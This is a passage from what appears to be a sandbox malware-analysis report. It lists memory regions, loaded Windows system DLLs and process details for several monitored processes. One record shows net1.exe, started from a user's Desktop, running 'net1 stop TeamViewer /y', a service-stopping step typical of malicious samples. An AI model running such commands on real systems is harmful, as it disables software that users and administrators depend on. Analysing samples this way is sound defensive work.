0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 910 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 940 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 941 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 942 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 943 start_va = 0x6d0000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 944 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 945 start_va = 0x8d0000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 946 start_va = 0x1cd0000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 991 start_va = 0x590000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 992 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 993 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 994 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 995 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 996 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 997 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 998 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 999 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1000 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1028 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1029 start_va = 0x1cd0000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 1030 start_va = 0x1e50000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1062 start_va = 0x1e60000 end_va = 0x2196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1063 start_va = 0x21a0000 end_va = 0x23b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 1084 start_va = 0x23c0000 end_va = 0x25d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 1085 start_va = 0x1cd0000 end_va = 0x1de4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 1086 start_va = 0x1e20000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1087 start_va = 0x25e0000 end_va = 0x27fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1088 start_va = 0x2800000 end_va = 0x2914fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1147 start_va = 0x860000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1148 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1149 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1150 start_va = 0x2920000 end_va = 0x29dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002920000" filename = "" Region: id = 1151 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1152 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1153 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1154 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1213 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1214 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1215 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1216 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1217 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1218 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1219 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1220 start_va = 0x8b0000 end_va = 0x8b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1221 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1231 start_va = 0x1df0000 end_va = 0x1df0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1232 start_va = 0x1e00000 end_va = 0x1e01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Thread: id = 34 os_tid = 0xe88 Thread: id = 37 os_tid = 0x10e0 Thread: id = 41 os_tid = 0x13a0 Thread: id = 48 os_tid = 0x11c8 Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x78771000" os_pid = "0x1164" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x62c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 887 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 888 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 889 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 890 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 891 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 892 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 893 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 894 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 895 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 896 start_va = 0x400000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 897 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 898 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 919 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 920 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 921 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 922 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 923 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 924 start_va = 0x400000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 925 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 926 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 927 start_va = 0x7ff8746c0000 end_va = 0x7ff874718fff monitored = 0 entry_point = 0x7ff8746cfbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 928 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 929 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 930 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 931 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 932 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 933 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 934 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 935 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 936 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 937 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 938 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 939 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 955 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 956 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 957 start_va = 0x680000 end_va = 0x807fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 958 start_va = 0x810000 end_va = 0x990fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 959 start_va = 0x9a0000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 960 start_va = 0x400000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 961 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1001 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1002 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1003 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1004 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1005 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1006 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1007 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1008 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1009 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1010 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1011 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1031 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1032 start_va = 0x1da0000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 1082 start_va = 0x1f40000 end_va = 0x2276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1083 start_va = 0x2280000 end_va = 0x2496fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1122 start_va = 0x24a0000 end_va = 0x26b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1123 start_va = 0x1da0000 end_va = 0x1eabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 1124 start_va = 0x1f30000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 1128 start_va = 0x26c0000 end_va = 0x28d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 1129 start_va = 0x28e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 1173 start_va = 0x470000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1174 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1175 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1176 start_va = 0x29f0000 end_va = 0x2aabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029f0000" filename = "" Region: id = 1177 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1178 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1179 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1180 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1181 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1182 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1183 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1184 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1185 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1186 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1187 start_va = 0x440000 end_va = 0x440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1188 start_va = 0x450000 end_va = 0x451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1189 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1190 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1222 start_va = 0x4c0000 end_va = 0x4c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Thread: id = 36 os_tid = 0x10d4 Thread: id = 40 os_tid = 0xe1c Thread: id = 42 os_tid = 0x830 Thread: id = 50 os_tid = 0x11fc Process: id = "16" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x590c6000" os_pid = "0x137c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x10a0" cmd_line = "C:\\Windows\\system32\\net1 stop TeamViewer /y" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1276 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1277 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1278 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1279 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1280 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1281 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1282 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1283 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = 